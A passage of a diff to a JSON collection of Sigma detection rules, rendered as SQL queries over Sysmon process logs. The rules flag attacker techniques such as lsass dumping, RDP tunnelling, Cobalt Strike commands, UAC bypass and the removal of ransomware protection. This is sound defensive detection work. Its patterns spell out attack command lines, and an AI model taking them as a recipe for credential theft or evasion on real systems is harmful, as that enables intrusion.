'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.exe') AND (CommandLine LIKE '%.bmp%' ESCAPE '\\' OR CommandLine LIKE '%.cr2%' ESCAPE '\\' OR CommandLine LIKE '%.eps%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\' OR CommandLine LIKE '%.ico%' ESCAPE '\\' OR CommandLine LIKE '%.jpeg%' ESCAPE '\\' OR CommandLine LIKE '%.jpg%' ESCAPE '\\' OR CommandLine LIKE '%.nef%' ESCAPE '\\' OR CommandLine LIKE '%.orf%' ESCAPE '\\' OR CommandLine LIKE '%.png%' ESCAPE '\\' OR CommandLine LIKE '%.raw%' ESCAPE '\\' OR CommandLine LIKE '%.sr2%' ESCAPE '\\' OR CommandLine LIKE '%.tif%' ESCAPE '\\' OR CommandLine LIKE '%.tiff%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_susp_execution_with_image_extension.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "HackTool - XORDump Execution", - "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", - "status": "test", - "description": "Detects suspicious use of XORDump process memory dumping utility", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", + "status": "experimental", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Another tool that uses the command line switches of XORdump" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_xordump.yml" + 
"filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "Potential RDP Tunneling Via SSH", - "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", "status": "experimental", - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_ssh_rdp_tunneling.yml" + "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Visual Basic Command Line Compiler Usage", - "id": "7b10f171-7f04-47c7-9fa2-5be43c76e535", - "status": "test", - "description": "Detects successful code compilation via Visual Basic Command Line Compiler that utilizes Windows Resource to Object Converter.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", + "status": "experimental", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream 
(ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ "attack.defense_evasion", - "attack.t1027.004" + "attack.t1564.004" ], "falsepositives": [ - "Utilization of this tool should not be seen in enterprise environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\vbc.exe' ESCAPE '\\' AND Image LIKE '%\\\\cvtres.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_lolbin_visual_basic_compiler.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "EvilNum APT Golden Chickens Deployment Via OCX Files", - "id": "8acf3cfa-1e8c-4099-83de-a0c4038e18f0", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects Golden Chickens deployment method as used by Evilnum and described in ESET July 2020 report", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%regsvr32%' ESCAPE '\\' AND CommandLine LIKE '%/s%' ESCAPE '\\' AND CommandLine LIKE '%/i%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.ocx%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 
'%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_evilnum_jul20.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Conti Volume Shadow Listing", - "id": "7b30e0a7-c675-4b24-8a46-82fa67e2433d", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects a command used by conti to find volume shadow backups", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.t1587.001", - "attack.resource_development" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%log.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_conti.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Execution of Suspicious File Type Extension", - "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", - "status": "experimental", - "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", - "author": "Max Altgelt (Nextron Systems)", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\')) AND NOT ((Image = '') OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image IN ('-', '')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR ((ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\' OR ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\')) OR (Image 
LIKE '%.scr' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla 
Firefox\\\\tobedeleted\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_susp_non_exe_image.yml" + "filename": "proc_creation_win_plink_susp_tunneling.yml" }, { - "title": "Winnti Pipemon Characteristics", - "id": "73d70463-75c9-4258-92c6-17500fe972f2", - "status": "stable", - "description": "Detects specific process characteristics of Winnti Pipemon malware reported by ESET", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate setups that use similar flags" + "Administrative activity", + "Software installation" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%setup0.exe -p%' ESCAPE '\\' OR (CommandLine LIKE '%setup.exe%' ESCAPE '\\' AND (CommandLine LIKE '%-x:0' ESCAPE '\\' OR CommandLine LIKE '%-x:1' ESCAPE '\\' OR CommandLine LIKE '%-x:2' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' 
ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_winnti_pipemon.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Dllhost.EXE Execution Anomaly", - "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", - "status": "experimental", - "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", + "status": "test", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1055" + "attack.t1036" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND Image LIKE '%\\\\dllhost.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (Image LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_dllhost_no_cli_execution.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { "title": "Suspicious Rundll32 Invoking Inline VBScript", 
@@ -11241,1218 +10891,1209 @@ "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Conhost.exe CommandLine Path Traversal", - "id": "ee5e119b-1f75-4b34-add8-3be976961e39", + "title": "Suspicious Sysmon as Execution Parent", + "id": "6d1058a4-407e-4f3a-a144-1968c11dc5c3", "status": "experimental", - "description": "detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.003" - ], + "description": "Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)", + "author": "Florian Roth (Nextron Systems), Tim Shelton (fp werfault)", "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentCommandLine LIKE '%conhost%' ESCAPE '\\' AND CommandLine LIKE '%/../../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\Sysmon64.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\conhost.exe' ESCAPE '\\' OR Image LIKE 'wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\WerFault.exe' ESCAPE '\\') OR Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Sysmon.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_conhost_path_traversal.yml" + "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" }, { - "title": "Regedit as Trusted Installer", - "id": "883835a7-df45-43e4-bf1d-4268768afda4", + "title": "Rundll32 Registered COM 
Objects", + "id": "f1edd233-30b5-4823-9e6a-c4171b24d316", "status": "test", - "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", - "author": "Florian Roth (Nextron Systems)", + "description": "load malicious registered COM objects", + "author": "frack113", "tags": [ "attack.privilege_escalation", - "attack.t1548" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regedit.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\TrustedInstaller.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ((CommandLine LIKE '%-sta %' ESCAPE '\\' OR CommandLine LIKE '%-localserver %' ESCAPE '\\') AND CommandLine LIKE '%{%' ESCAPE '\\' AND CommandLine LIKE '%}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regedit_trustedinstaller.yml" + "filename": "proc_creation_win_rundll32_registered_com_objects.yml" }, { - "title": "Operator Bloopers Cobalt Strike Commands", - "id": "647c7b9e-d784-4fda-b9a0-45c565a7b729", - "status": "experimental", - "description": "Detects use of Cobalt Strike commands accidentally entered in the CMD shell", - "author": "_pete_0, TheDFIRReport", + "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", + "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", + "status": "test", + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", - "attack.t1059.003" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' 
AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ((CommandLine LIKE 'cmd %' ESCAPE '\\' OR CommandLine LIKE 'cmd.exe%' ESCAPE '\\' OR CommandLine LIKE 'c:\\\\windows\\\\system32\\\\cmd.exe%' ESCAPE '\\') AND (CommandLine LIKE '%psinject%' ESCAPE '\\' OR CommandLine LIKE '%spawnas%' ESCAPE '\\' OR CommandLine LIKE '%make\\_token%' ESCAPE '\\' OR CommandLine LIKE '%remote-exec%' ESCAPE '\\' OR CommandLine LIKE '%rev2self%' ESCAPE '\\' OR CommandLine LIKE '%dcsync%' ESCAPE '\\' OR CommandLine LIKE '%logonpasswords%' ESCAPE '\\' OR CommandLine LIKE '%execute-assembly%' ESCAPE '\\' OR CommandLine LIKE '%getsystem%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml" + "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml" }, { - "title": "Raccine Uninstall", - "id": "a31eeaed-3fd5-478e-a8ba-e62c6b3f9ecc", + "title": "Regsvr32 Command Line Without DLL", + "id": "50919691-7302-437f-8e10-1fe088afa145", "status": "test", - "description": "Detects commands that indicate a Raccine removal from an end system. 
Raccine is a free ransomware protection tool.", + "description": "Detects a regsvr.exe execution that doesn't contain a DLL in the command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1574", + "attack.execution" ], "falsepositives": [ - "Legitimate deinstallation by administrative staff" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%taskkill %' ESCAPE '\\' AND CommandLine LIKE '%RaccineSettings.exe%' ESCAPE '\\') OR (CommandLine LIKE '%reg.exe%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Tray%' ESCAPE '\\') OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%/DELETE%' ESCAPE '\\' AND CommandLine LIKE '%Raccine Rules Updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.ocx%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.ax%' ESCAPE '\\' OR CommandLine LIKE '%.bav%' ESCAPE '\\' OR CommandLine LIKE '%.ppl%' ESCAPE '\\'))) AND NOT (CommandLine = '')) AND NOT (CommandLine = ''))" ], - "filename": "proc_creation_win_susp_disable_raccine.yml" + "filename": "proc_creation_win_regsvr32_no_dll.yml" }, { - "title": "Potential Suspicious Child Process Of 3CXDesktopApp", - "id": "63f3605b-979f-48c2-b7cc-7f90523fed88", - "status": "experimental", - "description": "Detects potential suspicious child processes of \"3CXDesktopApp.exe\". 
Which could be related to the 3CXDesktopApp supply chain compromise", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Base64 Encoded PowerShell Command Detected", + "id": "e32d4572-9826-4738-b651-95fa63747e8a", + "status": "test", + "description": "Detects usage of the \"FromBase64String\" function in the commandline which is used to decode a base64 encoded string", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1218" + "attack.t1027", + "attack.defense_evasion", + "attack.t1140", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Administrative script libraries" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%::FromBase64String(%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_3cx_compromise_susp_children.yml" + "filename": "proc_creation_win_powershell_frombase64string.yml" }, { - "title": "Run PowerShell Script from Redirected Input Stream", - "id": "c83bf4b5-cdf0-437c-90fa-43d734f7c476", + "title": "Bypass UAC via CMSTP", + "id": "e66779cc-383e-4224-a3a4-267eeb585c40", "status": "test", - "description": "Detects PowerShell script execution via input stream redirect", - "author": "Moriarty Meng (idea), Anton Kutepov (rule), oscd.community", + "description": "Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to 
install specially formatted local .INF files", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.execution", - "attack.t1059" + "attack.t1548.002", + "attack.t1218.003" ], "falsepositives": [ - "Unknown" + "Legitimate use of cmstp.exe utility by legitimate user" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine REGEXP '\\s-\\s*<')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR OriginalFileName = 'CMSTP.EXE') AND (CommandLine LIKE '%/s%' ESCAPE '\\' OR CommandLine LIKE '%-s%' ESCAPE '\\' OR CommandLine LIKE '%/au%' ESCAPE '\\' OR CommandLine LIKE '%-au%' ESCAPE '\\' OR CommandLine LIKE '%/ni%' ESCAPE '\\' OR CommandLine LIKE '%-ni%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_run_script_from_input_stream.yml" + "filename": "proc_creation_win_uac_bypass_cmstp.yml" }, { - "title": "UAC Bypass Using Disk Cleanup", - "id": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "title": "Potential QBot Activity", + "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", + "status": "stable", + "description": "Detects potential QBot activity by looking for process executions used previously by 